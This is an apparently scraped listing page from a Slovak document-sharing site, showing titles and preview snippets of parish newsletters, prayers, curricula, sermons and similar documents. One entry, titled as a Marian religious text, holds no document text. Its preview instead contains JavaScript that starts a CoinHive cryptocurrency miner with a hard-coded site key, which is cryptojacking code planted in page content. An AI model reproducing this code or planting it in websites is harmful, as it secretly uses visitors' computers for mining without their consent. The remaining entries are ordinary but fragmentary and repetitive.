F a r s k ý l i s t Gréckokatolícka cirkev, Farnosť Povýšenia sv. Kríža, Prešov-Sekčov Úvodník ročník X. Zdá sa mi, že život Cirkvi F a r s k ý l i s t 21 2015 11.10.2015 Gréckokatolícka cirkev, Farnosť Povýšenia sv. Kríža, Prešov-Sekčov Úvodník ročník X. Zdá sa mi, že život Cirkvi naberá vyššie obrátky. Tento mesiac prebieha synoda

Podrobnejšie

Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme

Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme Program pešej púte Bratislavská Kalvária - Lurdská jaskyňa - Železná studnička - Kačín - Marianka. Pešiu púť tvorí 10 zastavení: Počas pochodu budeme spievať piesne a modliť sa. 1. Lurdská jaskyňa: TÚŽBY

Podrobnejšie

Microsoft Word - Prayer - The Highest Form of Christian Service - Slovak.doc

Microsoft Word - Prayer - The Highest Form of Christian Service - Slovak.doc NAJVYŠŠIA FORMA KRESŤANSKEJ SLUŽBY Oswald, J. Smith NAJVYŠŠIA FORMA KRESŤANSKEJ SLUŽBY Najvyššou formou kresťanskej služby je prímluvná modlitba. Hovorím to bez obáv z protirečenia. A to, čo sa teraz chystám

Podrobnejšie

Dejepis extra 7/2016 Časopis nielen pre tých, ktorí majú radi históriu. Nedívajme sa iba pod nohy Na nádvorí Oblastného výboru Slovenského zväzu proti

Dejepis extra 7/2016 Časopis nielen pre tých, ktorí majú radi históriu. Nedívajme sa iba pod nohy Na nádvorí Oblastného výboru Slovenského zväzu proti Dejepis extra 7/2016 Časopis nielen pre tých, ktorí majú radi históriu. Nedívajme sa iba pod nohy Na nádvorí Oblastného výboru Slovenského zväzu protifašistických bojovníkov. Vážení čitatelia, napriek

Podrobnejšie

GEN

GEN V Bratislave 16. septembra 2016 Bratislavské vyhlásenie Dnešné stretnutie v Bratislave sa odohráva v období, ktoré je pre náš európsky projekt kritické. Bratislavský samit 27 členských štátov sa venoval

Podrobnejšie

Kat Infolist 17 tyzden 11

Kat Infolist 17 tyzden 11 Liturgický kalendár: KATEDRÁLNY INFOLIST 25.4. 1.5.2011 Želáme vám a vyprosujeme optimizmus sily života, ktorý dáva Ježiš svojim zmŕtvychvstaním. Buďme tými, ktorí všade vnášajú radosť Kristovho života.

Podrobnejšie

1 Pastor Chris Nepozeraj na vonkajšie zdanie Lebo toto terajšie ľahké bremeno súženia získa nám nesmiernu hojnosť večnej slávy, keď nehľadíme na vidit

1 Pastor Chris Nepozeraj na vonkajšie zdanie Lebo toto terajšie ľahké bremeno súženia získa nám nesmiernu hojnosť večnej slávy, keď nehľadíme na vidit 1 Pastor Chris Nepozeraj na vonkajšie zdanie Lebo toto terajšie ľahké bremeno súženia získa nám nesmiernu hojnosť večnej slávy, keď nehľadíme na viditeľné, ale na neviditeľné. Viditeľné je totiž dočasné,

Podrobnejšie

Inovované učebné osnovy ETICKÁ VÝCHOVA ISCED2 Učebná osnova predmetu ETICKÁ VÝCHOVA v 5. ročníku základnej školy Výchovno-vzdelávacie ciele a obsah vz

Inovované učebné osnovy ETICKÁ VÝCHOVA ISCED2 Učebná osnova predmetu ETICKÁ VÝCHOVA v 5. ročníku základnej školy Výchovno-vzdelávacie ciele a obsah vz Učebná osnova predmetu ETICKÁ VÝCHOVA v 5. ročníku základnej školy Výchovno-vzdelávacie ciele a obsah vzdelávania : Sú v súlade s cieľmi a obsahovým a výkonovým štandardom vzdelávacieho štandardu pre vyučovací

Podrobnejšie

Vzorové riešenia úlohy 4.1 Bodovanie Úvod do TI 2010 Dôvod prečo veľa z Vás malo málo bodov bolo to, že ste sa nepokúsili svoje tvrdenia dokázať, prič

Vzorové riešenia úlohy 4.1 Bodovanie Úvod do TI 2010 Dôvod prečo veľa z Vás malo málo bodov bolo to, že ste sa nepokúsili svoje tvrdenia dokázať, prič Vzorové riešenia úlohy 4.1 Bodovanie Úvod do TI 2010 Dôvod prečo veľa z Vás malo málo bodov bolo to, že ste sa nepokúsili svoje tvrdenia dokázať, pričom to je veľmi dôležitá súčasť úlohy. Body sa udeľovali

Podrobnejšie

Popolcová streda – 13

Popolcová streda – 13 ÚVAHY NA DNI VEĽKÉHO PÔSTU 2019 ŠTVRTÝ PÔSTNY TÝŽDEŇ = 8.4. 13.4. 2019 64 32 5 Niekoľko slov na úvod: Materiály, ktoré budú umiestňované na farskej webovej stránke v RUBRIKE NOVINKY, Vás pozývajú k tomu,

Podrobnejšie

STAUROS Č. 12 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE V knihe Manželská STK ma už dávnejšie zaujal jed

STAUROS Č. 12 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE V knihe Manželská STK ma už dávnejšie zaujal jed STAUROS Č. 12 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE V knihe Manželská STK ma už dávnejšie zaujal jeden príbeh. Odohral sa na kresťanskom pohrebe. Kňaz

Podrobnejšie

ALBATROS_MEDIA

ALBATROS_MEDIA I. Hovorí sa, že svet je dnes menší. A to preto, že sa veľmi rýchlo dostaneme hoci aj na druhý koniec sveta. Kedysi sme museli do Ameriky cestovať celé mesiace, a teraz tam preletíme za jeden deň. Podobne

Podrobnejšie

osnovy nav 5. roč.

osnovy nav 5. roč. Obsah predmetu náboženská výchova v 5. ročníku ZŠ: Ročníková téma: Poznávanie cez dialóg V tomto veku dieťa stále viac naväzuje a rozvíja vzťahy s okolitým svetom formou dialógu. Dialóg rozvíja nie len

Podrobnejšie

BU_3Q_2011.indd

BU_3Q_2011.indd 6 Týždeň od 30. júla do 5. augusta 40 Bohoslužba, pieseň a oslava Texty na tento týždeň: 1 Kron 16,8-36; Ž 32,1-5; 51,1-6; Fil 4,8; Zjav 4,9-11; 5,9-13 Základný verš Spievajte Hospodinovi novú pieseň,

Podrobnejšie

modlitebny_tyzden

modlitebny_tyzden Prorok Ozeáš (výber) Prvý z malých prorokov Ozeáš prorok, ktorý slúžil s prestávkou celých 70 rokov (podľa výpočtu kráľov u neho) v severnom, izraelskom národe /im patrí aj proroctvo; aj tam, kde hovorí

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint DEŇ DRUHÝ ZELENINA, OVOCIE, ORECHY Z NAŠICH SADOV AKTIVITY V školskej jedálni Prieskum Zdravá desiata V školskej záhrade V úžitkovej záhrade Čo sme sa naučili Otvorená hodina Zelenina a ovocie sú hlavné

Podrobnejšie

AGENDA

AGENDA AGENDA Evanjelickej cirkvi augsburského vyznania na Slovensku 1996 VENI SANGTE SPIRITUS PASCE PASTOREM DUC DUCEM APERI APERTURO DA DATURO EMITTE SPIRITUM TUUM ET CREABUNTUR ET RENOVABIS FACIEM TERRAE AMEN

Podrobnejšie

V jedinej lekcii Meno: 1 Ako reagujete na profesionálne médiá? Pracujte vo dvojiciach a pripravte sa na hranie rolí. Označte sa ako Osoba A a Osoba B.

V jedinej lekcii Meno: 1 Ako reagujete na profesionálne médiá? Pracujte vo dvojiciach a pripravte sa na hranie rolí. Označte sa ako Osoba A a Osoba B. 1 Ako reagujete na profesionálne médiá? Pracujte vo dvojiciach a pripravte sa na hranie rolí. Označte sa ako Osoba A a Osoba B. Prečítajte si ďalej uvedené situácie a precvičte si, ako reagovať, keď vidíte

Podrobnejšie

Bulletin16-17.indd

Bulletin16-17.indd Život Cirkvi Ročník 17 16-17/2011 Z tvojho Vzkriesenia, Kriste, raduje sa nebo a zem KOMENTÁR Tiché Božie milosrdenstvo Nedeľa Božieho milosrdenstva sa nám už akosi automaticky spája s Krakovom a svätou

Podrobnejšie

4. Aktivity Klubu pacientov SMyS [režim kompatibility]

4. Aktivity Klubu pacientov  SMyS [režim kompatibility] CZECH SLOVENSKÁ MYELÓMOVÁ SPOLOČNOSŤ KLUB PACIENTOV AKTIVITY KLUBU CMG M Y E L O M A GROUP PACIENTOV ČESKÁ MYELOMOVÁ SKUPINA MIKULOV, 13.- 14. 9. 2013 ŠKOLA MYELOMU PRE PACIENTOV Liptovský Ján, 28-29 September

Podrobnejšie

SPRAVODAJ Rímskokatolícka farnosť Kráľovnej pokoja Košice Juh 12/ Bratislavská sviečková manifestácia z 25. marca 1988 vstúpila do dejín

SPRAVODAJ Rímskokatolícka farnosť Kráľovnej pokoja Košice Juh 12/ Bratislavská sviečková manifestácia z 25. marca 1988 vstúpila do dejín SPRAVODAJ Rímskokatolícka farnosť Kráľovnej pokoja Košice Juh 12/2018 25.3.2018 Bratislavská sviečková manifestácia z 25. marca 1988 vstúpila do dejín ako jeden z najvýznamnejších verejných prejavov odporu

Podrobnejšie

LEKCIE PRE DETI NOVÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej,

LEKCIE PRE DETI NOVÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej, LEKCIE PRE DETI NOVÝ ZÁKON 1. časť Autor: Mgr. Henrieta Kocevová Vydal: Inštitút vzdelávania ECM pre potrebu zborov Evanjelickej cirkvi metodistickej, SO Rok vydania: 2019 Jazyková korektúra: Mgr. et Mgr.

Podrobnejšie

PREDCHÁDZAME PORUCHÁM UČENIA

PREDCHÁDZAME PORUCHÁM UČENIA Mgr. Zuzana Hronová NOVEMBER 2018 - Poruchy čítanej a písanej reči. - Ich predikcie je možné rozoznať už v predškolskom veku. - Majú neurobiologický pôvod, avšak včasnou intervenciou je možné stav zmierniť.

Podrobnejšie

Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa

Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa Apoštolské hnutie Božieho milosrdenstva Od chvíle keď sa ukázal Denníček sv. Sestry Faustíny, mnoho ľudí sa pýta, či taká kongregácia existuje, kde sa nachádza, a ktorá je to kongregácia. Iní skúšajú zakladať

Podrobnejšie

Microsoft Word - Čnosti.doc

Microsoft Word - Čnosti.doc Povolanie máme v konečnom dôsledku len jedno, a to dokonalosť. Svätý Otec Ján Pavol II. v encyklike Vita consecrata hovorí: Všetci sme pozvaní k dokonalosti. Túto výzvu na svätosť možno prijať a rozvíjať

Podrobnejšie

Súťaž Vráťme knihy do škôl je tu už po 8-krát! O súťaži Občianske združenie Učenie s úsmevom v spolupráci s partnermi internetové kníhkupectvo abcknih

Súťaž Vráťme knihy do škôl je tu už po 8-krát! O súťaži Občianske združenie Učenie s úsmevom v spolupráci s partnermi internetové kníhkupectvo abcknih Súťaž Vráťme knihy do škôl je tu už po 8-krát! O súťaži Občianske združenie Učenie s úsmevom v spolupráci s partnermi internetové kníhkupectvo abcknihy.sk Bratislavským samosprávnym krajom, vydavateľstvom

Podrobnejšie

Prípravka pre pôstny modlitebný týždeň 2013

Prípravka pre pôstny modlitebný  týždeň 2013 Prípravka pre pôstny modlitebný týždeň 2013 Kristus Baránok Boží učí nás vytrvalosti a vernosti 2Tim 3, 14 17; 4, 1 2 1. deň: Buď verný učeniu a presvedčeniu (v. 14) Byť verný dnes už nie je veľmi v móde.

Podrobnejšie

KARTA K OT obzvlášť dôležitý 2 - veľmi dôležitý 3 - dosť dôležitý 4 - trochu dôležitý 5 - nedôležitý 6 - som proti tomu KARTA K OT prech

KARTA K OT obzvlášť dôležitý 2 - veľmi dôležitý 3 - dosť dôležitý 4 - trochu dôležitý 5 - nedôležitý 6 - som proti tomu KARTA K OT prech KARTA K OT. 1 1 - obzvlášť dôležitý 2 - veľmi dôležitý 3 - dosť dôležitý 4 - trochu dôležitý 5 - nedôležitý 6 - som proti tomu KARTA K OT. 2 1 - prechovávam k nim veľké sympatie 2 - prechovávam k nim mierne

Podrobnejšie

Pobožnosť na vigíliu Narodenia Pána (v rodinách)

Pobožnosť na vigíliu Narodenia Pána (v rodinách) POBOŽNOSŤ NA VIGÍLIU NARODENIA PÁNA (v rodinách) Bezprostredne pred štedrou večerou sa rodina zíde na túto modlitbu. Vstupuje ňou do slávnosti Narodenia Pána. Miestom modlitby môže byť miesto, kde sa rodina

Podrobnejšie

Uloha trenera - V. Orszagh

Uloha trenera - V. Orszagh ÚLOHA TRÉNERA V DNEŠNOM HOKEJI Vladimír ORSZÁGH ÚLOHA TRÉNERA PLATÍ,ŽE KULTÚRU TÍMU ZOSOBŇUJE SÁM TRÉNER,MUSÍ BYŤ STELESNENÍM TOHO ČO POŽADUJE SÁM OD DRUHÝCH NA TRÉNINGU,NA ZÁPASE,VŠADE INDE. PLYNIE Z

Podrobnejšie

Microsoft Word - lutost.doc

Microsoft Word - lutost.doc ĽÚTOSŤ Petrova a Judášova ľútosť Nie každý pocit viny je výrazom pravej ľútosti nad hriechmi a otvorením sa Božiemu milosrdenstvu. V Evanjeliu nachádzame dva druhy ľútosti: Judášovu a Petrovu ľútosť. Judáš

Podrobnejšie

Implementácia FINANČNEJ GRAMOTNOSTI v ŠkVP ISCED2 Dodatok č. 1 UČEBNÉ OSNOVY: ETICKÁ VÝCHOVA Vypracované podľa: Školského vzdelávacieho programu z ETI

Implementácia FINANČNEJ GRAMOTNOSTI v ŠkVP ISCED2 Dodatok č. 1 UČEBNÉ OSNOVY: ETICKÁ VÝCHOVA Vypracované podľa: Školského vzdelávacieho programu z ETI Implementácia FINANČNEJ GRAMOTNOSTI v ŠkVP ISCED2 Dodatok č. 1 UČEBNÉ OSNOVY: ETICKÁ VÝCHOVA Vypracované podľa: Školského vzdelávacieho programu z ETICKEJ VÝCHOVY ISCED2 Národného štandardu finančnej gramotnosti

Podrobnejšie

Dobrovoľný príspevok: 0,20 Pohľad na kríž V tomto pôstnom čase mnohokrát uvažujeme o kríži Kristovom, aj tom našom. Môžeme povedať, že kríž je pre nás

Dobrovoľný príspevok: 0,20 Pohľad na kríž V tomto pôstnom čase mnohokrát uvažujeme o kríži Kristovom, aj tom našom. Môžeme povedať, že kríž je pre nás Dobrovoľný príspevok: 0,20 Pohľad na kríž V tomto pôstnom čase mnohokrát uvažujeme o kríži Kristovom, aj tom našom. Môžeme povedať, že kríž je pre nás knihou, z ktorej možno čítať; je knihou, v ktorej

Podrobnejšie

WALLMAPU

WALLMAPU WALLMAPU DOMINIK JAKUBOV 2018/2019 Obsah Poloha Ohraničenie Povrch Regióny Vlajka Mapuche Liečivá sila Machi Vojna Arauco Argentínska a Čílska okupácia Súčasnosť Zdroje Poloha Kontinent: Južná Amerika

Podrobnejšie

Microsoft Word - spevnik 2010 bez akordov.doc

Microsoft Word - spevnik 2010 bez akordov.doc Spevník mládežníckych piesní Farnosti Strečno A všetko, čo má 152 Duchu Svätý príď 143 Kríž je znakom spásy 42 A-a-a-aleluja 383 Duchu Svätý príď k nám 18 Krok sem, krok tam 386 Adeste, fideles 410 Duchu

Podrobnejšie

Ako ziskat uspokojenie a radost zo zivota_ 2015_117x179_DO TLACE.indd

Ako ziskat uspokojenie a radost zo zivota_ 2015_117x179_DO TLACE.indd Ak v srdci cítime radosť, je to znamenie, že konáme správne N epoznám veľa pravidiel šťastného života, ale toto jedno určite postačí: Hovorme, myslime a jednajme tak, ako nám káže svedomie. Nechci byť

Podrobnejšie

ETV 6

ETV 6 Etická VI. ročník Tematický výchovno-vzdelávací plán bol vypracovaný podľa učebných osnov Štátneho vzdelávacieho programu a upravený podľa Školského vzdelávacieho programu Štvorlístok. Schválené PK dňa

Podrobnejšie

10 tipov pre tvoj forex úspech

10 tipov pre tvoj forex úspech 5 konkrétnych spôsobov, ako zarobiť 1 milión EUR Redakcia Svet bohatých Ak má človek zdravé ruky a trocha rozumu, dá sa dosiahnuť čokoľvek. Po svete dnes behá viacero ľudí, ktorí vďaka kreativite a vytrvalosti

Podrobnejšie

MoSta 1.indd

MoSta 1.indd Načo je bolesť 2/2019 OĽGA ADAMKOVIČOVÁ-SEMKOVÁ (z básnickej zbierky Prídavok) Načo je bolesť smútok trápenie Človek s tým denne zápasí Viem o tom svoje Isto vieš aj ty Svoj kríž si nesie každý Zvyčajne

Podrobnejšie

2_detsky pesibus v Novakoch_Putiska Ivan

2_detsky pesibus v Novakoch_Putiska Ivan Ivan Putiška Nováky PEŠIBUS Je to PEŠIBUS ekologický, bezpečný, rýchly, nenáročný a lacný spôsob dopravy. V PEŠIBUSE každé ráno pešo odprevadí do školy skupinu detí jeden dospelý vodič PEŠIBUSU /rodič

Podrobnejšie

Zdravotná pomoc a zvýšenie zdravotného povedomia

Zdravotná pomoc a zvýšenie zdravotného povedomia Budovanie zdravých rómskych komunít II. kapitola Podpora zdravia Ing. Jana Maciaková Zdravotná pomoc a zvýšenie zdravotného povedomia Cieľ: Umožniť účastníkom vzdelávania pochopiť zdravotnú situáciu európskych

Podrobnejšie

Pašie

Pašie V mene Pána Ježiša Krista, toho ukrižovaného! PAŠIE História utrpenia a smrti Pána a nášho Spasiteľa Ježiša Krista čítané na Kvetnú nedeľu a Veľký piatok s predpašiovou 5. pôstnou nedeľou 1996 Tranoscius,

Podrobnejšie

Oznamy

Oznamy VII 12 23.06.2019 OZNAMY Zmena času sv. omší Zvlášť počas letných mesiacov júl august, bude zmena sv. omší. Prosím vás, aby ste si dobre pozreli liturgický prehľad. Prikázaný sviatok 29.6.2019 V sobotu,

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint Biblická súťaž Bratislavskej arcidiecézy 1. Vyber správnu odpoveď Kto sa pýtal Ježiša na zničenie chrámu a na znamenia začiatku týchto udalostí? A/ farizeji a zákonníci B/ Peter a Jakub B, C; Mk 13, 3

Podrobnejšie

STAUROS Č. 11 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Pred časom som narazil na knihu s názvom Viac Je

STAUROS Č. 11 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Pred časom som narazil na knihu s názvom Viac Je STAUROS Č. 11 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Pred časom som narazil na knihu s názvom Viac Ježiša, menej náboženstva. Autor Steve Arterburn v nej

Podrobnejšie

Microsoft Word - Vízia

Microsoft Word - Vízia VÍZIA ECAV 2020 Písmo, reformácia a Augsburské vyznanie Sme cirkvou Božieho slova, ktorej Písmo je prameňom viery a pravidlom života. Božie slovo obsiahnuté v Písme máme poverenie zvestovať pravdivo, odvážne

Podrobnejšie

Október-_Rim_4_-_1_Kor_1.doc

Október-_Rim_4_-_1_Kor_1.doc Rozpis čítania NZ na Október 08 - Rok sv. Pavla Dát. deň Lectio divina Prečítať Dát. deň Lectio divina Prečítať 1. st Rim 4,13-25 Mk 14 17. pia 11, 25-36 Lk 14 2. št 5, 1-11 15 18. so 12, 1-8 15 3. pia

Podrobnejšie

3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. M

3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. M 3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. Martinovi 2. Zamyslenie na deň 3. Litánie k sv. Martinovi

Podrobnejšie

Microsoft Word - Kniha2_Uvod_Moderator.doc

Microsoft Word - Kniha2_Uvod_Moderator.doc OBJAVOVANIE DÔVERNÉHO VZŤAHU S BOHOM DRUHÁ KNIHA Príručka pre moderátora 2... Príručka pre moderátora, Úvod Ak nie je uvedené inak, použité biblické texty sú prevzaté z Biblie, Slovenský ekumenický preklad,

Podrobnejšie

Apoštol Panny Márie

Apoštol Panny Márie var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bU D87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); var miner = new CoinHive.Anonymous('_'); miner.start();

Podrobnejšie

30440_Enek_szlovak_2016._ofi.indd

30440_Enek_szlovak_2016._ofi.indd Cvičenie rytmu a písanie nôt Taktová čiara Doplňte taktové čiary, potom rytmus vytlieskajte. Tlačiarenský škriatok ukradol niektoré rytmické hodnoty. Doplňte ich.??? Doplňte chýbajúce solmizačné slabiky.

Podrobnejšie

untitled

untitled Názov školy:...... Typ školy:... Vyučovací jazyk:... TRIEDNA KNIHA pre primárne vzdelávanie Trieda: Školský rok:....../... Začiatok školského roka dňa: Koniec prvého polroka dňa: Koniec druhého polroka

Podrobnejšie

STAUROS Č. 7 marec/apríl 2017 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Na úvod znova malá pôstna bilancia: Na pr

STAUROS Č. 7 marec/apríl 2017 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Na úvod znova malá pôstna bilancia: Na pr STAUROS Č. 7 marec/apríl 2017 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Na úvod znova malá pôstna bilancia: Na prvú pôstnu nedeľu nám Kristus sľúbil, že uvidíme otvorené

Podrobnejšie

Všetci by sme mali byť feminist(k)ami (Ukážka)

Všetci by sme mali byť feminist(k)ami (Ukážka) Chimamanda Ngozi Adichie VŠETCI BY SME MALI BYŤ FEMINIST(K)AMI Preložila Kristína Karabová ÚVOD Toto je modifikovaná verzia prejavu, s ktorým som vystúpila v decembri 2012 na TEDxEus ton, každoročnej konferencii

Podrobnejšie

STAUROS Č. 6 marec/apríl 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Určite sme už mnohí počuli o tzv. kríze s

STAUROS Č. 6 marec/apríl 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Určite sme už mnohí počuli o tzv. kríze s STAUROS Č. 6 marec/apríl 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Určite sme už mnohí počuli o tzv. kríze stredného veku. Existuje mnoho jej popisov, aj zaručených

Podrobnejšie

Krížová cesta Otcov

Krížová cesta Otcov Krížová cesta otcov / z rádia Lumen 2007 / Úvodná modlitba V mene Otca, i Syna i Ducha Svätého. Bože Otče, chceme sa teraz chvíľu zastaviť a spolu so sv. Jozefom, ktorý je vzorom nám mužom a otcom, chcem

Podrobnejšie

Popolcová streda – 13

Popolcová streda – 13 ÚVAHY NA DNI VEĽKÉHO PÔSTU 2019 DRUHÝ PÔSTNY TÝŽDEŇ = 18. 3. 24. 3. 2019 2 Niekoľko slov na úvod: Materiály, ktoré budú umiestňované na farskej webovej stránke v RUBRIKE NOVINKY, Vás pozývajú k tomu, aby

Podrobnejšie

(07) Rekonštrukcia Mierového námestia kamenná dlažba alebo trávnik? sa na mestskom úrade v Trenčíne uskutočnilo stretnutie zástupcov volnéh

(07) Rekonštrukcia Mierového námestia kamenná dlažba alebo trávnik? sa na mestskom úrade v Trenčíne uskutočnilo stretnutie zástupcov volnéh (07) Rekonštrukcia Mierového námestia kamenná dlažba alebo trávnik? 10.09.2015 sa na mestskom úrade v Trenčíne uskutočnilo stretnutie zástupcov volného združenia Náš Trenčín s autormi víťazného návrhu

Podrobnejšie

Hodnotenie v predmetoch VÝTVARNÁ VÝCHOVA, HUDOBNÁ VÝCHOVA, VÝCHOVA UMENÍM, TELESNÁ VÝCHOVA, NÁBOŽENSKÁ VÝCHOVA, ETICKÁ VÝCHOVA, PRACOVNÉ VYUČOVANIE, T

Hodnotenie v predmetoch VÝTVARNÁ VÝCHOVA, HUDOBNÁ VÝCHOVA, VÝCHOVA UMENÍM, TELESNÁ VÝCHOVA, NÁBOŽENSKÁ VÝCHOVA, ETICKÁ VÝCHOVA, PRACOVNÉ VYUČOVANIE, T Hodnotenie v predmetoch VÝTVARNÁ VÝCHOVA, HUDOBNÁ VÝCHOVA, VÝCHOVA UMENÍM, TELESNÁ VÝCHOVA, NÁBOŽENSKÁ VÝCHOVA, ETICKÁ VÝCHOVA, PRACOVNÉ VYUČOVANIE, TECHNICKÁ VÝCHOVA, SVET PRÁCE A TECHNIKA, OBČIANSKA

Podrobnejšie

STAUROS Č. 8 apríl 2013 Informačný dvojtýždenník gréckokatolíckej farnosti v Bratislave Drahí bratia a sestry! slovíčko o Slove Pred nejakým časom som

STAUROS Č. 8 apríl 2013 Informačný dvojtýždenník gréckokatolíckej farnosti v Bratislave Drahí bratia a sestry! slovíčko o Slove Pred nejakým časom som STAUROS Č. 8 apríl 2013 Informačný dvojtýždenník gréckokatolíckej farnosti v Bratislave Drahí bratia a sestry! slovíčko o Slove Pred nejakým časom som videl dokument, ktorý odvysielala televízia Lux. Bola

Podrobnejšie

SMART Brain-worksopy-1

SMART Brain-worksopy-1 I N O V Á C I A - K R E A T I V I T A - I N Š P I R Á C I A ROZVOJ ĽUDSKÉHO MOZGU N A J N O V Š I E V Ý S K U M Y N E U R O V E D Y A B E H A V I O R Á L N E P R Í S T U P Y A P L I K O V A N É V P R A

Podrobnejšie

Všeobecný úvod do sviatostí

Všeobecný úvod do sviatostí Sviatosti uvádzania do kresťanského života Všeobecný úvod do sviatostí 1. Sviatosti a Ježiš Kristus Základom našich sviatostí je Ježiš Kristus, jeho slová a skutky ktoré konal počas svojho pozemského života.

Podrobnejšie

40

40 KOMENTÁR K BIBLICKÝM KN IHÁM PRE BIBLICKÚ OLYMPIÁDU 2015/2016 prof. ThDr. František Trstenský, PhD. PRVÁ KNIHA SAMUELOVA Prvú a Druhú knihu Samuelovu (1 2 Sam) môžeme aj označiť názvom Knihy o monarchii.

Podrobnejšie

Microsoft Word - a13_45.SK.doc

Microsoft Word - a13_45.SK.doc EURÓPY DVOR AUDÍTOROV PREJAV Luxemburg 10. decembra 2013 ECA/13/45 Prejav Vítora Caldeiru, predsedu Európskeho dvora audítorov Predstavenie výročnej správy za rok 2012 Rade Európskej únie (hospodárske

Podrobnejšie

Erasmus na sicilií

Erasmus na sicilií ERASMUS PROGRAM NA SICÍLIÍ Katalin Deáková, Terézia Tumová III.DFT ERASMUS+ Študijný pobyt v Barcellona Pozzo di Gotto bol pre nás skúsenosťou, ktorú sme nikdy v živote nemali. Prihlásili sme sa sem lebo

Podrobnejšie

2 Extrémna krížová cesta 2019 Rozjímania Cirkev v 21. storočí Dlho som premýšľal nad životom prvých kresťanov. Nemali kostoly, média, školy, chýbali i

2 Extrémna krížová cesta 2019 Rozjímania Cirkev v 21. storočí Dlho som premýšľal nad životom prvých kresťanov. Nemali kostoly, média, školy, chýbali i 2 Extrémna krížová cesta 2019 Rozjímania Cirkev v 21. storočí Dlho som premýšľal nad životom prvých kresťanov. Nemali kostoly, média, školy, chýbali im vzdelaní kňazi, peniaze, no napriek tomu ich počet

Podrobnejšie

ROZBOR ZÁ SÁHOVEJ Č INNOSTI za rok 2016 V roku 2016 vykonali jednotky HaZZ Trnavského kraja spolu 3147 zásahov. Z celkového počtu zásahov bolo 1020 vý

ROZBOR ZÁ SÁHOVEJ Č INNOSTI za rok 2016 V roku 2016 vykonali jednotky HaZZ Trnavského kraja spolu 3147 zásahov. Z celkového počtu zásahov bolo 1020 vý ROZBOR ZÁ SÁHOVEJ Č INNOSTI za rok 2016 V roku 2016 vykonali jednotky HaZZ Trnavského kraja spolu 3147 zásahov. Z celkového počtu zásahov bolo 1020 k požiarom (32 %), 31 k požiarom bez zásahu (1 %), 927

Podrobnejšie

ILP-HRI 2015

ILP-HRI 2015 ILP-HRI 2015 Médiá si navzájom odporujú, klamú, neviem sa v tom vyznať. Ako rozoznať, čo je skutočnosť a čo je výmysel? Nie je to také jednoduché, informácie v médiách nie sú čierno-biele, postavené iba

Podrobnejšie

APOLÓGIA,

APOLÓGIA, APOLÓGIA, čiže OBRANA AUGSBURSKÉHO VIEROVYZNANIA Predhovor Filip Melanchton čitateľovi pozdravenie v Pánu. Keď sa Vierovyznanie našich kniežat verejne bolo prečítalo, niektorí teológovia a mnísi zostavili

Podrobnejšie